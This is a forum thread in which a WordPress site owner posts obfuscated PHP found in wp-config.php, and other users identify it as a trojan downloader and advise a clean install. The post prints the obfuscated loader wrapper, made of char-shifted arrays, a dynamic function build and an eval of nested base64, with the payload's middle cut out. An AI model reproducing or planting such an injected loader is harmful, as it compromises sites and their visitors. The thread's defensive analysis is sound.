Found hidden WP malicious code

I checked out my wp-config.php file and found this code at the top. Anyone know what it is or who can decode it?

<?php                                                          $NehPYG= array('4255','4272','4251','4262');$AhKDUwIzLXpP2hcO4nPrU0y= array('2971','2986','2973','2969','2988','2973','2967','2974','2989','2982','2971','2988','2977','2983','2982');$GDNIrktQr4jbqSB2FQHxYJbTXRaHHzdA2R9j2sZjm9lDR= array('4006','4005','4023','4009','3962','3960','4003','4008','4009','4007','4019','4008','4009');$OacCikY0ctQ4XpKujTp27vMTygKKYeNWfPooZdf2xWWlbxGkg="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBFWWxaYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelpFeFdTRTVNVVRJeGMySlZiRVJhT
..........
yUnNiSE5QV0hCclVqQmFOVnBGVG01aFZtUnlUVVJHYUdGcmNEUlVWV2hQWWpGd2MwOVhjRnBXTTJoNlYxY3hSMkZ0UmpWVFdFSlFaREk1VEZwc1JuZFBWVTUxVFVWemFVdFRhemRKUVQwOUlpa3BPeUE9IikpOyA=";if (!function_exists("o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0")){ function o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($M9KqHq1KYdNOwDLWmEWRFlFISb4hpKj1K,$dia9SYcvCyZ){$ZbI6TeioM1pH = '';foreach($M9KqHq1KYdNOwDLWmEWRFlFISb4hpKj1K as $chiwS1E01EIQG3i5SnfUWcD1lSD){$ZbI6TeioM1pH .= chr($chiwS1E01EIQG3i5SnfUWcD1lSD - $dia9SYcvCyZ);}return $ZbI6TeioM1pH;}$EErbDZzvLO34AbJRbQal = o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($NehPYG,4154);$VlQpSPGCFXX9eYD = o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($AhKDUwIzLXpP2hcO4nPrU0y,2872);$mYF2SAsT99UPa6p = o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($GDNIrktQr4jbqSB2FQHxYJbTXRaHHzdA2R9j2sZjm9lDR,3908);$f6E0LathXg = $VlQpSPGCFXX9eYD('$b5KWjzsbhSt1StMytIOIQKcHmc0t07zS2aFbzXcHFwyoP',$EErbDZzvLO34AbJRbQal.'('.$mYF2SAsT99UPa6p.'($b5KWjzsbhSt1StMytIOIQKcHmc0t07zS2aFbzXcHFwyoP));');$f6E0LathXg($OacCikY0ctQ4XpKujTp27vMTygKKYeNWfPooZdf2xWWlbxGkg);}?>

Since the middle portion of the code has been removed, it’s impossible to decode it.

However, you correct in identifying that it should not be there.

From what I’ve seen in the past, the most common code injections display alternative search results to search engine bots, such as advertising pharmacy drugs and the like.

It likely isn’t the only place where you have malicious code injected into files on your site.

The best thing would be to do a clean install. Your database could contain injected code too depending on the vulnerability used.

I removed the majority of the code as we don’t really need to make it any easier than it is for script-kiddies by posting something they can copy.

Avast AV says

Severity - High
Status - Threat: PHP: Agent-RK [Trj]

*Actually it seems it’s a trojan downloader

Kaspersky thread from 2006 http://forum.kaspersky.com/index.php?showtopic=21009
Microsoft http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader%3AWin32%2FAgent.RK

You’re definately going to want to do more than just remove the code.

I base64_decode’d it and best as I can tell it checks for various things then uses curl to go to source sites to download files, writes them to temp dir(s), runs them, then unlink()s the files.
That is, you more than likely have who know’s what within both your files and database. I strongly suggest you take Patche’s suggestion and do a clean install and then roll back your database to the last backup before this happened.

If you haven’t read Hardening WordPress you should do so.